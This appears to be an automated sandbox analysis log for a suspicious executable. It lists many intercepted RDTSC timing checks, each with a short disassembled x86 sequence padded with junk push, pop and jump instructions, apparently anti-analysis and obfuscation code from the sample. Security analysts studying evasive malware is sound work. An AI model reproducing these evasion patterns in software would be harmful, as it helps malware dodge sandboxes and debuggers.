Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2926E second address: C29278 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F568CBD42B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6A23 second address: BA6A3B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F568CECBB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b jo 00007F568CECBB32h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C28085 second address: C28089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C28089 second address: C28091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C28091 second address: C280BA instructions: 0x00000000 rdtsc 0x00000002 je 00007F568CBD42BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F568CBD42C7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C280BA second address: C280CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB2Ch 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2822E second address: C28232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C28232 second address: C28236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C28236 second address: C2823C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2823C second address: C28285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB2Fh 0x00000007 jno 00007F568CECBB40h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F568CECBB2Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 ja 00007F568CECBB26h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C28563 second address: C2857A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F568CBD42C1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2870D second address: C2871C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F568CECBB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C289A7 second address: C289D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F568CBD42C4h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F568CBD42BBh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C289D2 second address: C289D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C289D6 second address: C289DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C289DC second address: C289F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F568CECBB37h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C289F7 second address: C28A0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C28A0A second address: C28A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2CF1F second address: C2CF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jbe 00007F568CBD42B6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F568CBD42B6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2CF34 second address: C2CF3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2CF3C second address: C2CF41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2CF41 second address: C2CF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C317D0 second address: C317FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F568CBD42C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C317FE second address: C31802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C31802 second address: C3181C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d je 00007F568CBD42B6h 0x00000013 jp 00007F568CBD42B6h 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3181C second address: C31828 instructions: 0x00000000 rdtsc 0x00000002 js 00007F568CECBB2Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C33F76 second address: C33F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C33F7A second address: C33F7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C33F7E second address: C33F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F568CBD42C1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d je 00007F568CBD42BCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C33F9F second address: C33FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007F568CECBB39h 0x0000000a jno 00007F568CECBB26h 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C33FC8 second address: C33FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C39FD8 second address: C39FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jnl 00007F568CECBB26h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38847 second address: C38852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38852 second address: C3888C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F568CECBB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F568CECBB37h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F568CECBB26h 0x00000017 jmp 00007F568CECBB31h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C389E3 second address: C389FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C389FB second address: C38A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38A00 second address: C38A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38A0D second address: C38A26 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F568CECBB26h 0x00000008 jl 00007F568CECBB26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38D03 second address: C38D07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38E6D second address: C38E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F568CECBB31h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C392C2 second address: C392C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C392C6 second address: C392DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F568CECBB2Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C39CC4 second address: C39CE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42BDh 0x00000007 jbe 00007F568CBD42B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 jng 00007F568CBD42B6h 0x00000018 pop ebx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C39CE8 second address: C39CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3DDD6 second address: C3DDE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F568CBD42BCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3DDE4 second address: C3DDED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3D14A second address: C3D156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnl 00007F568CBD42B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3D156 second address: C3D15A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3D15A second address: C3D164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3D164 second address: C3D16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3D16A second address: C3D16E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3D3EB second address: C3D3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F568CECBB2Bh 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3D561 second address: C3D567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3D6C9 second address: C3D6D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F568CECBB26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3D6D5 second address: C3D6D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4E40 second address: BA4E4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F568CECBB26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4E4C second address: BA4E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C43D2E second address: C43D33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C43E73 second address: C43E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44867 second address: C4487C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F568CECBB2Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4487C second address: C44888 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F568CBD42B6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44B7E second address: C44B84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44B84 second address: C44BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F568CBD42C9h 0x00000009 jng 00007F568CBD42B6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C45143 second address: C45147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C45147 second address: C45171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F568CBD42BEh 0x0000000c jng 00007F568CBD42B6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 pushad 0x00000016 popad 0x00000017 pop eax 0x00000018 popad 0x00000019 pushad 0x0000001a jo 00007F568CBD42B8h 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 jnl 00007F568CBD42B6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C459C3 second address: C459C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4A83F second address: C4A845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4A845 second address: C4A84D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4A409 second address: C4A40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4A40D second address: C4A413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4A413 second address: C4A41D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F568CBD42B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4A41D second address: C4A421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4A584 second address: C4A589 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4A589 second address: C4A591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C55D3B second address: C55D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C55D44 second address: C55D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C55D48 second address: C55D4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C55D4E second address: C55D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F568CECBB2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C55EB3 second address: C55EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F568CBD42C0h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F568CBD42C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C55EE0 second address: C55EFB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F568CECBB31h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C55EFB second address: C55EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5617A second address: C5617E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C565B2 second address: C565C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F568CBD42BBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C565C3 second address: C565DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F568CECBB31h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5A930 second address: C5A934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5DC6F second address: C5DC77 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5DC77 second address: C5DC81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F568CBD42B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5DC81 second address: C5DC85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5DC85 second address: C5DC90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F2C6 second address: C5F2CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F2CA second address: C5F2D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F2D6 second address: C5F2DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C626C6 second address: C626CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C626CC second address: C626D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C626D5 second address: C626DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C626DB second address: C626DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C626DF second address: C626E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C626E5 second address: C626F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F568CECBB26h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C626F3 second address: C626F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C620BC second address: C620C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C620C0 second address: C6210D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F568CBD42B6h 0x00000008 jp 00007F568CBD42B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 ja 00007F568CBD42C9h 0x00000016 jmp 00007F568CBD42C5h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F568CBD42BCh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6210D second address: C62117 instructions: 0x00000000 rdtsc 0x00000002 je 00007F568CECBB2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6238F second address: C62393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D9FA second address: C6DA26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB2Eh 0x00000007 jmp 00007F568CECBB31h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F568CECBB26h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6DA26 second address: C6DA48 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F568CBD42B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F568CBD42BAh 0x00000012 jns 00007F568CBD42B6h 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6DA48 second address: C6DA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
